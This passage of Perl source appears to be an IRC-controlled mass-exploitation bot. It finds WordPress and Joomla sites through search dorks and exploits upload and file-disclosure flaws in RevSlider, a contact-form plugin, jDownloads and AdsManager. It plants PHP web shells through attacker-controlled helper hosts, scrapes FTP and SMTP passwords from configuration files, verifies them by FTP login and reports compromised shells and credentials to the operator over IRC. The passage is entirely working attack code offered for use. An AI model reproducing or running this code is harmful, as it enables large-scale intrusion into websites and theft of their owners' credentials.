  2407.     my $shell = "http://".$site."wp-content/".$black."/revslider/.libs.php";
  2408.  
  2409.     my $bogex = "http://".$site."wp-content.php";
  2410.  
  2411.     my $exploit = $ua->post("$url", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);
  2412.  
  2413.     my $status  = $exploit->as_string;
  2414.  
  2415.     if ($status =~ /Wrong update extracted folder/) {
  2416.  
  2417.     my $check = &get_content($shell."?bajak"); &get_content($shell."?cpanel");&get_content($shell."?bogel"); sleep(2);
  2418.  
  2419.     if ($check =~ /bogel - exploit/ || $check =~ /aanK - exploit/){
  2420.  
  2421.     my $safe = "";
  2422.  
  2423.     my $os   = "";
  2424.  
  2425.     my $uid  = "";
  2426.  
  2427.     if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  2428.  
  2429.     if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  2430.  
  2431.     if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  2432.  
  2433.     my $lari = &get_content($bogex); &get_content($bogex."?cpanel");
  2434.  
  2435.     if ($lari =~ /bogel - exploit/i){
  2436.  
  2437.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2438.  
  2439.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $bogex 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2440.  
  2441.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2442.  
  2443.     &mylove($bypass,$chan,$site,$engine);
  2444.  
  2445.     } else {
  2446.  
  2447.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2448.  
  2449.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $shell 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2450.  
  2451.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2452.  
  2453.     &mylove($bypass,$chan,$site,$engine);
  2454.  
  2455.         }
  2456.  
  2457.     }
  2458.  
  2459.     }
  2460.  
  2461. }
  2462.  
  2463. }
  2464.  
  2465. }
  2466.  
  2467.    
  2468.  
  2469. sub mylove() {
  2470.  
  2471.     my $url    = $_[0];
  2472.  
  2473.     my $chan   = $_[1];
  2474.  
  2475.     my $site   = $_[2];
  2476.  
  2477.     my $engine = $_[3];
  2478.  
  2479.     my $logo   = $_[4];
  2480.  
  2481.     my @print;
  2482.  
  2483.     my $target = &get_content($url);
  2484.  
  2485.     if ($target =~ /Manage Cookies/i) {
  2486.  
  2487.     &msg("$admin","$bplogo3 $site");
  2488.  
  2489.     }
  2490.  
  2491.     return @print;
  2492.  
  2493. }
  2494.  
  2495.  
  2496.  
  2497. sub finder() {
  2498.  
  2499.     my $chan = $_[0];
  2500.  
  2501.     my $site = $_[1];
  2502.  
  2503.     my $engine = $_[2];
  2504.  
  2505.     my $nick = $_[3];
  2506.  
  2507.     my $logo = $_[4];
  2508.  
  2509.     my $coba = $blackunix."mail.php?url=".$site;
  2510.  
  2511.     my $taik = &get_content($coba);
  2512.  
  2513.     if ($taik =~ /Upload Success/i) {
  2514.  
  2515.     &msg("$chan","$revlogo15,1[15@4$engine15]11 Executing Payloads..1.");
  2516.  
  2517.     my $xmlrpc = "http://".$site."wp-xmlrpc.php";
  2518.  
  2519.     my $check = &get_content($xmlrpc);
  2520.  
  2521.     if ($check =~ /recky aka bogel/i) {
  2522.  
  2523.     my $safe = "";
  2524.  
  2525.     my $os   = "";
  2526.  
  2527.     my $free  = "";
  2528.  
  2529.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  2530.  
  2531.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  2532.  
  2533.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  2534.  
  2535.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  2536.  
  2537.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2538.  
  2539.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2540.  
  2541.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2542.  
  2543.     }
  2544.  
  2545. }
  2546.  
  2547. }
  2548.  
  2549.  
  2550.  
  2551. sub finder2() {
  2552.  
  2553.     my $chan = $_[0];
  2554.  
  2555.     my $site = $_[1];
  2556.  
  2557.     my $engine = $_[2];
  2558.  
  2559.     my $nick = $_[3];
  2560.  
  2561.     my $logo = $_[4];
  2562.  
  2563.     my $coba = $blackunix."mail2.php?url=".$site;
  2564.  
  2565.     my $taik = &get_content($coba);
  2566.  
  2567.     if ($taik =~ /Upload Success/i) {
  2568.  
  2569.     &msg("$chan","$revlogo15,1[15@4$engine15]11 Executing Payloads..2.");
  2570.  
  2571.     my $xmlrpc = "http://".$site."wp-xmlrpc.php";
  2572.  
  2573.     my $check = &get_content($xmlrpc);
  2574.  
  2575.     if ($check =~ /recky aka bogel/i) {
  2576.  
  2577.     my $safe = "";
  2578.  
  2579.     my $os   = "";
  2580.  
  2581.     my $free  = "";
  2582.  
  2583.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  2584.  
  2585.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  2586.  
  2587.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  2588.  
  2589.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  2590.  
  2591.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2592.  
  2593.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2594.  
  2595.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2596.  
  2597.     }
  2598.  
  2599. }
  2600.  
  2601. }
  2602.  
  2603.  
  2604.  
  2605. sub finder3() {
  2606.  
  2607.     my $chan = $_[0];
  2608.  
  2609.     my $site = $_[1];
  2610.  
  2611.     my $engine = $_[2];
  2612.  
  2613.     my $nick = $_[3];
  2614.  
  2615.     my $logo = $_[4];
  2616.  
  2617.     my $coba = $blackunix."mail3.php?url=".$site;
  2618.  
  2619.     my $taik = &get_content($coba);
  2620.  
  2621.     if ($taik =~ /Upload Success/i) {
  2622.  
  2623.     &msg("$chan","$revlogo15,1[15@4$engine15]11 Executing Payloads..3.");
  2624.  
  2625.     my $xmlrpc = "http://".$site."wp-xmlrpc.php";
  2626.  
  2627.     my $check = &get_content($xmlrpc);
  2628.  
  2629.     if ($check =~ /recky aka bogel/i) {
  2630.  
  2631.     my $safe = "";
  2632.  
  2633.     my $os   = "";
  2634.  
  2635.     my $free  = "";
  2636.  
  2637.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  2638.  
  2639.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  2640.  
  2641.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  2642.  
  2643.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  2644.  
  2645.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2646.  
  2647.     &msg("$nick","$revlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2648.  
  2649.     &msg("$chan","$revlogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2650.  
  2651.     }
  2652.  
  2653. }
  2654.  
  2655. }
  2656.  
  2657. sub mailer() {
  2658.  
  2659.     my $chan = $_[0];
  2660.  
  2661.     my $site = $_[1];
  2662.  
  2663.     my $engine = $_[2];
  2664.  
  2665.     my $nick = $_[3];
  2666.  
  2667.     my $logo = $_[4];
  2668.  
  2669.     my $coba = $blackunix."mailer.php?url=".$site;
  2670.  
  2671.     my $taik = &get_content($coba);
  2672.  
  2673.     if ($taik =~ /Upload Success/i) {
  2674.  
  2675.     &msg("$chan","$revlogo15,1[15@4$engine15]11 Executing Payloads...");
  2676.  
  2677.     my $wplink = "http://".$site."wp-link.php";
  2678.  
  2679.     my $check = &get_content($wplink);
  2680.  
  2681.     if ($check =~ /GIF89a/i) {
  2682.  
  2683.     my $safe = "";
  2684.  
  2685.     my $os   = "";
  2686.  
  2687.     my $free  = "";
  2688.  
  2689.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  2690.  
  2691.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  2692.  
  2693.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  2694.  
  2695.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  2696.  
  2697.     &msg("$admin","$revlogo15,1[15@4$engine15][15@4 Mailer Boss 15]9 $wplink 15,1[15@");    
  2698.  
  2699.     }
  2700.  
  2701. }
  2702.  
  2703. }
  2704.  
  2705. ##
  2706.  
  2707. sub cfx_exploit() {
  2708.  
  2709.     my $chan = $_[0];
  2710.  
  2711.     my $bug = $_[1];
  2712.  
  2713.     my $dork = $_[2];
  2714.  
  2715.     my $engine = $_[3];
  2716.  
  2717.     my $nick = $_[4];
  2718.  
  2719.     my $count = 0;
  2720.  
  2721.     my @list = &search_engine($chan,$bug,$dork,$engine,$cfxlogo,$nick);
  2722.  
  2723.     my $num = scalar(@list);
  2724.  
  2725.     if ($num > 0){
  2726.  
  2727.         foreach my $site(@list){
  2728.  
  2729.         $count++;
  2730.  
  2731.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  2732.  
  2733.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2734.  
  2735.         foreach my $kontak (@kontakz) {
  2736.  
  2737.         my $test = "http://".$site.$kontak."inc/upload.php?folder=/cfg-contactform/upload/&fileext=php";
  2738.  
  2739.         my $cek = &cfxexp($test);
  2740.  
  2741.         my $bogex = "";
  2742.  
  2743.         if ($cek =~ /filename":"(.*)php/i){
  2744.  
  2745.         $bogex = $1;}
  2746.  
  2747.         my $xmlrpc = "http://".$site.$kontak."upload/.libs.php";
  2748.  
  2749.         my $blickunix = "http://".$site."wp-content.php";
  2750.  
  2751.         my $check = &get_content($xmlrpc."?bajak");
  2752.  
  2753.         if ($check =~ /bogel - exploit/ || $check =~ /aanK - exploit/){
  2754.  
  2755.         my $safe = "";
  2756.  
  2757.         my $os = "";
  2758.  
  2759.         my $uid = "";
  2760.  
  2761.         if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  2762.  
  2763.         if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  2764.  
  2765.         if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  2766.  
  2767.         my $chmod = &get_content($blickunix);
  2768.  
  2769.         if ($chmod =~ /bogel - exploit/i){
  2770.  
  2771.         &msg("$admin","$cfxlogo15,1[15@4$engine15][15@4SheLL15]9 $blickunix 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2772.  
  2773.         &msg("$nick","$cfxlogo15,1[15@4$engine15][15@4SheLL15]9 $blickunix 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2774.  
  2775.         &msg("$chan","$cfxlogo15,1[15@4$engine15][15@4SheLL15]9 sent to $nick 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2776.  
  2777.         } else {
  2778.  
  2779.         &msg("$admin","$cfxlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2780.  
  2781.         &msg("$nick","$cfxlogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2782.  
  2783.         &msg("$chan","$cfxlogo15,1[15@4$engine15][15@4SheLL15]9 sent to $nick 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2784.  
  2785.         }
  2786.  
  2787.     }
  2788.  
  2789. }
  2790.  
  2791.             } exit; }
  2792.  
  2793.             }
  2794.  
  2795.         }
  2796.  
  2797. }
  2798.  
  2799.  
  2800.  
  2801. sub cfxexp() {
  2802.  
  2803.     my ($url) = @_;
  2804.  
  2805.     my $aplod = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  2806.  
  2807.     my $res = $aplod->post($url,[ 'Filedata' => [ './myluph.PHP' => '.libs.php']], 'Content-type' => 'form-data');
  2808.  
  2809.     my $hasil = $res->content;
  2810.  
  2811.     return $hasil;
  2812.  
  2813. }
  2814.  
  2815.  
  2816.  
  2817. ###
  2818.  
  2819.  
  2820.  
  2821. sub hdf_exploit() {
  2822.  
  2823.     my $chan = $_[0];
  2824.  
  2825.     my $bug = $_[1];
  2826.  
  2827.     my $dork = $_[2];
  2828.  
  2829.     my $engine = $_[3];
  2830.  
  2831.     my $nick = $_[4];
  2832.  
  2833.     my $count = 0;
  2834.  
  2835.     my @list = &search_engine($chan,$bug,$dork,$engine,$hdflogo,$nick);
  2836.  
  2837.     my $num = scalar(@list);
  2838.  
  2839.     if ($num > 0){
  2840.  
  2841.         foreach my $site(@list){
  2842.  
  2843.         $count++;
  2844.  
  2845.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  2846.  
  2847.         my $target = "http://".$site.$bug;
  2848.  
  2849.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2850.  
  2851.         my $check = &get_content($target);
  2852.  
  2853.         if ($check =~ /class JConfig/) {
  2854.  
  2855.         my ($host,$user,$pass);
  2856.  
  2857.         $target =~ s/http:\/\///;
  2858.  
  2859.         $target =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  2860.  
  2861.         if ($check =~ m/\$ftp_host = '(.+?)';/i){$host=$1;}
  2862.  
  2863.         if ($check =~ m/\$ftp_user = '(.+?)';/i){$user=$1;}
  2864.  
  2865.         if ($check =~ m/\$ftp_pass = '(.+?)';/i){$pass=$1;}
  2866.  
  2867.         if ($check =~ m/\$smtphost = '(.+?)';/i){$smtphost=$1;}
  2868.  
  2869.         if ($check =~ m/\$smtpport = '(.+?)';/i){$smtpport=$1;}
  2870.  
  2871.         if ($check =~ m/\$smtpuser = '(.+?)';/i){$smtpuser=$1;}
  2872.  
  2873.         if ($check =~ m/\$smtppass = '(.+?)';/i){$smtppass=$1;}
  2874.  
  2875.         if ($host =~ /127.0.0.1/) { $host = $target}
  2876.  
  2877.         &msg("$chan","$hdflogo15,1[15@4$engine15]4 Host:3 $host 4| 4User:3 $user 4| 4Pass:3 $pass 15][ 4SmtpHost:3 $smtphost 4| 4SmtpPort:3 $smtpport 4| 4SmtpUser:3 $smtpuser 4| 4SmtpPass:3 $smtppass ");
  2878.  
  2879.         if ($user =~ /_/) { my @userz = split("_", $user); $user = $userz[0];}
  2880.  
  2881.         my $success = 1;
  2882.  
  2883.         use Net::FTP;
  2884.  
  2885.         eval {
  2886.  
  2887.         my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 6);
  2888.  
  2889.         $success = 0 if $ftp->login($user,$pass);
  2890.  
  2891.         $ftp->quit;
  2892.  
  2893.         };
  2894.  
  2895.         if ($success == 0) {
  2896.  
  2897.             &msg("$admin","$hdflogo15,1[15@4$engine15]14 FTP4 3ftp://".$host." 4| 4User:3 $user 4| 4Pass:3 $pass 15]9 FVCKED!");
  2898.  
  2899.             &msg("$nick","$hdflogo15,1[15@4$engine15]14 FTP4 3ftp://".$host." 4| 4User:3 $user 4| 4Pass:3 $pass 15]9 FVCKED!");
  2900.  
  2901.             #&msg("$chan","$hdflogo15,1[15@4$engine15][8 Status Login cPanel 9OK! 15-8 Result Sent to 9ADMIN 15] ");
  2902.  
  2903.         }
  2904.  
  2905.          else {
  2906.  
  2907.             #&msg("$chan","15,1 [9FTP15] [ 9ftp://".$host." 15] [".$user." : ".$pass."15] 4Denied ");
  2908.  
  2909.          }
  2910.  
  2911.         }
  2912.  
  2913.     } exit;
  2914.  
  2915. }
  2916.  
  2917.         }
  2918.  
  2919.     }
  2920.  
  2921. }
  2922.  
  2923. ##
  2924.  
  2925. sub jdl_exploit() {
  2926.  
  2927.     my $chan = $_[0];
  2928.  
  2929.     my $bug = $_[1];
  2930.  
  2931.     my $dork = $_[2];
  2932.  
  2933.     my $engine = $_[3];
  2934.  
  2935.     my $nick = $_[4];
  2936.  
  2937.     my $count = 0;
  2938.  
  2939.     my @list = &search_engine($chan,$bug,$dork,$engine,$jdllogo,$nick);
  2940.  
  2941.     my $num = scalar(@list);
  2942.  
  2943.     if ($num > 0){
  2944.  
  2945.         foreach my $site(@list){
  2946.  
  2947.         $count++;
  2948.  
  2949.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  2950.  
  2951.         my $test = "http://".$site.$bug;
  2952.  
  2953.         if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  2954.  
  2955.         my $xmlrpc = "http://".$site."images/jdownloads/screenshots/m.libs.up.php.j";
  2956.  
  2957.         my $blockunix = "http://".$site."logs/myluph.php";
  2958.  
  2959.         my $smtp1 = "http://".$site."logs/myluph.php?bogel";
  2960.  
  2961.         my $smtp2 = "http://".$site."images/jdownloads/screenshots/m.libs.up.php.j?clone";
  2962.  
  2963.         my $cz  = &get_content($test); {
  2964.  
  2965.         &down($chan,$site,$engine,$nick,$jdllogo); &down2($chan,$site,$engine,$nick,$jdllogo);
  2966.  
  2967.         my $bogex = $bulusukan."jdownloads.php?url=".$site;
  2968.  
  2969.         &get_content($bogex);
  2970.  
  2971.         my $check = &get_content($xmlrpc."?clone");  
  2972.  
  2973.         if ($check =~ /roin aka cucu/i){
  2974.  
  2975.         my $safe = "";
  2976.  
  2977.         my $os = "";
  2978.  
  2979.         my $uid = "";
  2980.  
  2981.         if ($check =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
  2982.  
  2983.         if ($check =~ /Uname : (.*?)<\/b>/){$os=$1;}
  2984.  
  2985.         if ($check =~ /uid=(.*?)gid=/){$uid=$1;}
  2986.  
  2987.         my $chmod = &get_content($blockunix);sleep(1);
  2988.  
  2989.         if ($chmod =~ /bogel - exploit/i || $chmod =~ /roin aka cucu/i){
  2990.  
  2991.         &msg("$admin","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 ".$blockunix." 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2992.  
  2993.         &msg("$nick","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 ".$blockunix." 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2994.  
  2995.         &msg("$chan","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  2996.  
  2997.         &smtp($smtp2,$chan,$site,$engine);
  2998.  
  2999.         &bogex($smtp2,$chan,$site,$engine);
  3000.  
  3001.         } else {
  3002.  
  3003.         &msg("$admin","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 ".$xmlrpc." 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3004.  
  3005.         &msg("$nick","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 ".$xmlrpc." 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3006.  
  3007.         &msg("$chan","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3008.  
  3009.         &smtp($smtp1,$chan,$site,$engine);
  3010.  
  3011.         &bogex($smtp1,$chan,$site,$engine);
  3012.  
  3013.         }
  3014.  
  3015.     }
  3016.  
  3017. }
  3018.  
  3019.             } exit; }
  3020.  
  3021.             }
  3022.  
  3023.         }
  3024.  
  3025. }
  3026.  
  3027.  
  3028.  
  3029. sub down() {
  3030.  
  3031.     my $chan = $_[0];
  3032.  
  3033.     my $site = $_[1];
  3034.  
  3035.     my $engine = $_[2];
  3036.  
  3037.     my $nick = $_[3];
  3038.  
  3039.     my $logo = $_[4];
  3040.  
  3041.     my $coba = $bulusukan."down.php?url=".$site;
  3042.  
  3043.     my $taik = &get_content($coba);
  3044.  
  3045.     if ($taik =~ /Upload Success/i) {
  3046.  
  3047.     my $xmlrpc = "http://".$site."cache/bogel.php";
  3048.  
  3049.     my $check = &get_content($xmlrpc);
  3050.  
  3051.     if ($check =~ /recky aka bogel/i) {
  3052.  
  3053.     my $safe = "";
  3054.  
  3055.     my $os   = "";
  3056.  
  3057.     my $free  = "";
  3058.  
  3059.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3060.  
  3061.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3062.  
  3063.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3064.  
  3065.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3066.  
  3067.     &msg("$admin","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3068.  
  3069.     &msg("$nick","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3070.  
  3071.     &msg("$chan","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3072.  
  3073.     }
  3074.  
  3075.     }
  3076.  
  3077. }
  3078.  
  3079.  
  3080.  
  3081.  
  3082.  
  3083. sub down2() {
  3084.  
  3085.     my $chan = $_[0];
  3086.  
  3087.     my $site = $_[1];
  3088.  
  3089.     my $engine = $_[2];
  3090.  
  3091.     my $nick = $_[3];
  3092.  
  3093.     my $logo = $_[4];
  3094.  
  3095.     my $coba = $bulusukan."down2.php?url=".$site;
  3096.  
  3097.     my $taik = &get_content($coba);
  3098.  
  3099.     if ($taik =~ /Upload Success/i) {
  3100.  
  3101.     my $xmlrpc = "http://".$site."cache/myluph.php";
  3102.  
  3103.     my $check = &get_content($xmlrpc);
  3104.  
  3105.     if ($check =~ /recky aka bogel/i) {
  3106.  
  3107.     my $safe = "";
  3108.  
  3109.     my $os   = "";
  3110.  
  3111.     my $free  = "";
  3112.  
  3113.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3114.  
  3115.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3116.  
  3117.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3118.  
  3119.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3120.  
  3121.     &msg("$admin","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3122.  
  3123.     &msg("$nick","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3124.  
  3125.     &msg("$chan","$jdllogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3126.  
  3127.     }
  3128.  
  3129.     }
  3130.  
  3131. }
  3132.  
  3133.  
  3134.  
  3135.  
  3136.  
  3137. ####
  3138.  
  3139. sub ads_exploit() {
  3140.  
  3141.     my $chan = $_[0];
  3142.  
  3143.     my $bug = $_[1];
  3144.  
  3145.     my $dork = $_[2];
  3146.  
  3147.     my $engine = $_[3];
  3148.  
  3149.     my $nick = $_[4];
  3150.  
  3151.     my $count = 0;
  3152.  
  3153.     my @list = &search_engine($chan,$bug,$dork,$engine,$adslogo,$nick);
  3154.  
  3155.     my $num = scalar(@list);
  3156.  
  3157.     if ($num > 0){
  3158.  
  3159.         foreach my $site(@list){
  3160.  
  3161.         $count++;
  3162.  
  3163.         if ($count == $num-1) { &msg("$chan","14I'm Done in 15$engine "); }
  3164.  
  3165.             if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  3166.  
  3167.             my $box = "http://".$site."cache/recky.php";
  3168.  
  3169.             my $bot  = "http://".$site."cache/metri.php";
  3170.  
  3171.             my $xmlrpc = "http://".$site."tmp/plupload/myluph.php";
  3172.  
  3173.             my $smtpluph = "http://".$site."tmp/plupload/myluph.php?x=spread";
  3174.  
  3175.             my $recky  = "http://".$site."/index.php?option=com_adsmanager&task=upload&tmpl=component";
  3176.  
  3177.             my $cek  = &get_content($recky);
  3178.  
  3179.             if ($cek =~ /jsonrpc/i){
  3180.  
  3181.             my $type = $bulusukan."ads.php?url=".$site;
  3182.  
  3183.             my $bgl = &get_content($type); { &adsxp($chan,$site,$engine,$nick,$adslogo); &adsxp2($chan,$site,$engine,$nick,$adslogo); &adsxp3($chan,$site,$engine,$nick,$adslogo);
  3184.  
  3185.             my $check = &get_content($xmlrpc."?x=spread"); &get_content($xmlrpc."?cpanel");
  3186.  
  3187.             if ($check =~ /recky aka bogel/) {
  3188.  
  3189.             my $safe = "";
  3190.  
  3191.             my $os   = "";
  3192.  
  3193.             my $free  = "";
  3194.  
  3195.             if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3196.  
  3197.             if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3198.  
  3199.             if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3200.  
  3201.             if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3202.  
  3203.             &msg("$admin","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3204.  
  3205.             &msg("$nick","$adslogo15,1[4@15$engine15][4@15SheLL15]9 $xmlrpc 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3206.  
  3207.             &msg("$chan","$adslogo15,1[4@15$engine15][4@15SheLL15]9 Target Sent to 7*8 $nick 7* 15,1[4@15$os15][4@15safemode 7:7 $safe15]");
  3208.  
  3209.             &smtp($smtpluph,$chan,$site,$engine);
  3210.  
  3211.         }
  3212.  
  3213.     }
  3214.  
  3215.  
  3216.  
  3217. } &findx($chan,$site,$engine,$nick,$adslogo); &adsxp4($chan,$site,$engine,$nick,$adslogo);
  3218.  
  3219.             } exit; }
  3220.  
  3221.         }
  3222.  
  3223.     }
  3224.  
  3225. }
  3226.  
  3227.  
  3228.  
  3229. sub adsxp() {
  3230.  
  3231.     my $chan = $_[0];
  3232.  
  3233.     my $site = $_[1];
  3234.  
  3235.     my $engine = $_[2];
  3236.  
  3237.     my $nick = $_[3];
  3238.  
  3239.     my $logo = $_[4];
  3240.  
  3241.     my $xmlrpc = "http://".$site."images/com_adsmanager/ads/uploaded/index.php";
  3242.  
  3243.     my $smtpluph = "http://".$site."images/com_adsmanager/ads/uploaded/index.php?x=spread";
  3244.  
  3245.     my $check = &get_content($xmlrpc."?x=spread");
  3246.  
  3247.     if ($check =~ /recky aka bogel/i) {
  3248.  
  3249.     my $safe = "";
  3250.  
  3251.     my $os   = "";
  3252.  
  3253.     my $free  = "";
  3254.  
  3255.     if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  3256.  
  3257.     if ($check =~ m/SAFE MODE : (.*?)<\/b><\/font>/) {$safe = $1;}
  3258.  
  3259.     if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  3260.  
  3261.     if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  3262.  
  3263.     &msg("$admin","$adslogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3264.  
  3265.     &msg("$nick","$adslogo15,1[15@4$engine15][15@4SheLL15]9 $xmlrpc 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3266.  
  3267.     &msg("$chan","$adslogo15,1[15@4$engine15][15@4SheLL15]9 Target Sent to 4*8 $nick 4* 15,1[15@4$os15][15@4safemode 7:4 $safe15]");
  3268.  
  3269.     &smtp($smtpluph,$chan,$site,$engine);
  3270.  
  3271.     }
  3272.  
  3273. }
  3274.  
  3275. ##
  3276.  
  3277.  
  3278.  
  3279. sub adsxp2() {
  3280.  
  3281.     my $chan = $_[0];
  3282.  
  3283.     my $site = $_[1];
  3284.  
  3285.     my $engine = $_[2];
  3286.  
  3287.     my $nick = $_[3];
  3288.  
